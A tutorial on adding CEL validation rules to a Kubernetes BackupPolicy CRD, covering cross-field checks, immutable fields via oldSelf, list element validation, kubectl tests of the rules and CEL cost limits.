CEL Syntax Basics

CEL expressions are small programs. In Kubernetes CRD validation, the key variables are:

  Variable   Meaning
  self       The current field value (or the root object at the top level)
  oldSelf    The previous value of the field; a rule that references it is evaluated only on update

CEL returns true (validation passes) or false (validation fails, API returns error).

Common patterns:

# String not empty
self.size() > 0

# String matches format
self.matches('^[a-z][a-z0-9-]*$')

# Integer in range
self >= 1 && self <= 365

# Field present (for optional fields)
has(self.fieldName)

# Conditional: if A then B
!has(self.premium) || self.retentionDays <= 90

# List not empty
self.size() > 0

# All items in list satisfy condition
self.all(item, item.namespace.size() > 0)

# Cross-field: access sibling field via parent
self.retentionDays >= self.minRetentionDays

Adding CEL Rules to the BackupPolicy CRD

Start from the CRD built in EP04. Add x-kubernetes-validations at the levels where you need them.

Rule 1: Cron expression validation

The OpenAPI pattern field can validate basic structure, but a proper cron regex is unwieldy. CEL is cleaner:

spec:
  type: object
  required: ["schedule", "retentionDays"]
  x-kubernetes-validations:
    - rule: "self.schedule.matches('^(\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+)$')"
      message: "schedule must be a valid 5-field cron expression"

Rule 2: Cross-field validation

spec:
  type: object
  x-kubernetes-validations:
    - rule: "!(self.storageClass == 'premium') || self.retentionDays <= 90"
      message: "premium storage class supports at most 90 days retention"
    - rule: "!self.suspended || !has(self.pausedBy) || self.pausedBy.size() > 0"
      message: "when suspended is true, pausedBy must be non-empty if provided"

Rule 3: Immutable fields

Once a BackupPolicy is created, the schedule field should not be changeable without deleting and recreating:

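schedule:
  type: string
  x-kubernetes-validations:
    - rule: "self == oldSelf"
      message: "schedule is immutable after creation"
      reason: FieldValueInvalid

reason field: The supported reasons are FieldValueInvalid (default), FieldValueForbidden, FieldValueRequired, and FieldValueDuplicate. Immutable is not among them; immutability comes from the rule itself, which compares self with oldSelf. A failed rule is returned as HTTP 422 with the rule's message. Choosing FieldValueForbidden instead changes the error prefix from “Invalid value” to “Forbidden”.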

Rule 4: Conditional required field

If storageClass is encrypted, then encryptionKeyRef must be present:

spec:
  type: object
  x-kubernetes-validations:
    - rule: "self.storageClass != 'encrypted' || has(self.encryptionKeyRef)"
      message: "encryptionKeyRef is required when storageClass is 'encrypted'"
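
The rule is an implication written as “not A, or B”. A quick way to convince yourself it covers all four cases is to mirror it in ordinary code. In this stdlib-only sketch the spec struct is a hypothetical stand-in, and a nil pointer plays the role of an absent optional field, which is what has() tests for in CEL.

```go
package main

import "fmt"

// spec mirrors the two fields the rule reads. A nil EncryptionKeyRef means
// the optional field was not set.
type spec struct {
	StorageClass     string
	EncryptionKeyRef *string
}

// encryptionRuleHolds mirrors the CEL rule:
// self.storageClass != 'encrypted' || has(self.encryptionKeyRef)
func encryptionRuleHolds(s spec) bool {
	return s.StorageClass != "encrypted" || s.EncryptionKeyRef != nil
}

func main() {
	key := "backup-key" // hypothetical key name
	cases := []spec{
		{StorageClass: "standard"},
		{StorageClass: "standard", EncryptionKeyRef: &key},
		{StorageClass: "encrypted"},
		{StorageClass: "encrypted", EncryptionKeyRef: &key},
	}
	for _, c := range cases {
		fmt.Printf("storageClass=%-9s keyRef set=%-5t valid=%t\n",
			c.StorageClass, c.EncryptionKeyRef != nil, encryptionRuleHolds(c))
	}
}
```

Only the third case fails: encrypted storage without a key reference. Every other combination passes, including a key reference on a non-encrypted class, which the rule deliberately does not forbid.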

Rule 5: List element validation

Ensure each target namespace is a valid RFC 1123 DNS label:

targets:
  type: array
  items:
    type: object
    x-kubernetes-validations:
      - rule: "self.namespace.matches('^[a-z0-9]([-a-z0-9]*[a-z0-9])?$')"
        message: "namespace must be a valid DNS label"

The Complete Updated CRD with CEL

apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: backuppolicies.storage.example.com
spec:
  group: storage.example.com
  scope: Namespaced
  names:
    plural:     backuppolicies
    singular:   backuppolicy
    kind:       BackupPolicy
    shortNames: [bp]
  versions:
    - name: v1alpha1
      served: true
      storage: true
      schema:
        openAPIV3Schema:
          type: object
          required: ["spec"]
          properties:
            spec:
              type: object
              required: ["schedule", "retentionDays"]
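              x-kubernetes-validations:
                - rule: "!(self.storageClass == 'premium') || self.retentionDays <= 90"
                  message: "premium storage class supports at most 90 days retention"
                - rule: "self.storageClass != 'encrypted' || has(self.encryptionKeyRef)"
                  message: "encryptionKeyRef is required when storageClass is 'encrypted'"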
              properties:
                schedule:
                  type: string
                  x-kubernetes-validations:
                    - rule: "self == oldSelf"
                      message: "schedule is immutable after creation"
                      reason: FieldValueInvalid
                retentionDays:
                  type: integer
                  minimum: 1
                  maximum: 365
                storageClass:
                  type: string
                  default: "standard"
                  enum: ["standard", "premium", "encrypted", "archive"]
                encryptionKeyRef:
                  type: string
                targets:
                  type: array
                  maxItems: 20
                  items:
                    type: object
                    required: ["namespace"]
                    x-kubernetes-validations:
                      - rule: "self.namespace.matches('^[a-z0-9]([-a-z0-9]*[a-z0-9])?$')"
                        message: "namespace must be a valid DNS label"
                    properties:
                      namespace:
                        type: string
                      includeSecrets:
                        type: boolean
                        default: false
                suspended:
                  type: boolean
                  default: false
            status:
              type: object
              x-kubernetes-preserve-unknown-fields: true
      subresources:
        status: {}
      additionalPrinterColumns:
        - name: Schedule
          type: string
          jsonPath: .spec.schedule
        - name: Retention
          type: integer
          jsonPath: .spec.retentionDays
        - name: Ready
          type: string
          jsonPath: .status.conditions[?(@.type=='Ready')].status
        - name: Age
          type: date
          jsonPath: .metadata.creationTimestamp

Testing CEL Rules

Apply the updated CRD:

kubectl apply -f backuppolicies-crd-cel.yaml

Test cross-field validation:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: premium-long
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 180          # violates: premium + > 90 days
  storageClass: premium
EOF

The BackupPolicy "premium-long" is invalid:
  spec: Invalid value: "object":
    premium storage class supports at most 90 days retention

Test immutability:

# Create valid policy
kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: immutable-test
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
EOF

# Try to change the schedule
kubectl patch bp immutable-test -n demo \
  --type=merge -p '{"spec":{"schedule":"0 3 * * *"}}'

The BackupPolicy "immutable-test" is invalid:
  spec.schedule: Invalid value: "0 3 * * *":
    schedule is immutable after creation

Test list element validation:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: bad-namespace
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 7
  targets:
    - namespace: "UPPERCASE_IS_INVALID"
EOF

The BackupPolicy "bad-namespace" is invalid:
  spec.targets[0]: Invalid value: "object":
    namespace must be a valid DNS label

CEL Cost and Limits

CEL expressions are evaluated at admission time in the API server. Kubernetes imposes cost limits to prevent expressions from consuming excessive CPU:

  • Each expression is assigned a cost based on its operations (string matches, list iteration, etc.)
  • If the expression cost exceeds the per-validation limit, the API server rejects the CRD itself when you apply it
  • Complex all() over large lists is the most common way to hit cost limits

If you hit a cost limit error:

CustomResourceDefinition is invalid: spec.validation.openAPIV3Schema...
  CEL expression cost exceeds budget

Solutions:
  • Reduce list traversal in CEL rules; enforce list length with maxItems instead
  • Split one expensive rule into multiple simpler rules
  • Move the expensive validation to a controller (status condition) rather than admission


⚠ Common Mistakes

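Assuming oldSelf is nil on create. A rule that references oldSelf is a transition rule: the API server evaluates it only on updates, when both an old and a new value exist, and skips it on create. A rule like self == oldSelf therefore needs no null guard. The thing to watch for is the opposite: a transition rule never runs on create, and it does not run when the field was absent from the old object, so it cannot enforce anything about the initial value. If a rule must also run on create, newer Kubernetes versions add optionalOldSelf: true, which turns oldSelf into an optional value.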

Forgetting has() checks for optional fields. If encryptionKeyRef is optional (not in required) and you write a rule like self.encryptionKeyRef.size() > 0, it will fail with a “no such key” error when the field is absent. Always guard optional field access with has(self.fieldName).

Overloading CEL for what a controller should do. CEL validates fields at admission. If your rule needs to verify that a referenced Secret actually exists, CEL cannot do that — it only sees the object being submitted. Use a controller status condition for existence checks, not CEL.


Quick Reference: Common CEL Patterns

# String not empty
self.size() > 0

# String matches regex
self.matches('^[a-z][a-z0-9-]{1,62}$')

# Optional field guard
!has(self.fieldName) || self.fieldName.size() > 0

# Conditional requirement
!(condition) || has(self.requiredWhenConditionIsTrue)

# Immutable field (update only)
self == oldSelf

# All list items satisfy condition
self.all(item, item.namespace.size() > 0)

# At least one list item satisfies condition
self.exists(item, item.type == 'primary')

# Cross-field comparison
self.minReplicas <= self.maxReplicas

# Enum-style check
self in ['standard', 'premium', 'archive']

Key Takeaways

  • x-kubernetes-validations with CEL rules replaces most validating admission webhooks for CRD-specific logic
  • CEL runs inside the API server — no external service, no TLS, no separate deployment
  • Cross-field validation, immutable fields, and conditional requirements are all expressible in CEL
  • Use has() guards for optional fields; remember that rules referencing oldSelf run only on update, never on create
  • CEL has cost limits — avoid unbounded list iteration; use maxItems to bound lists first

What’s Next

EP06: The Kubernetes Controller Reconcile Loop explains how a controller watches BackupPolicy objects and acts on them — the mechanism that makes CRDs useful beyond validated configuration storage. Before writing code in EP07, you need to understand the reconcile loop conceptually.
